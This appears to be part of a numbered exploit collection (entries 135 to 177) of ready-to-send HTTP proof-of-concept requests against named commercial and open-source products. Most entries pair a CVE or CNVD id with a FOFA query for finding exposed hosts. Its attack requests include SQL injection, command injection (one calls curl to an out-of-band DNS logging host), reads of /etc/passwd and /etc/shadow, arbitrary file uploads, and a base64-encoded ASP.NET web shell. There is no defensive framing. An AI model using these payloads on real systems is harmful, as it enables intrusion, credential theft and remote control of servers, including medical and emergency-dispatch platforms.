jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}


135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1


138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1


140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1


141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded



dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -


142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip


146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close


148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}


151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip


153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config


Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}


Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd


154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}


155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


Access the uploaded file to see the output: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical imaging archiving and communication (PACS) system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
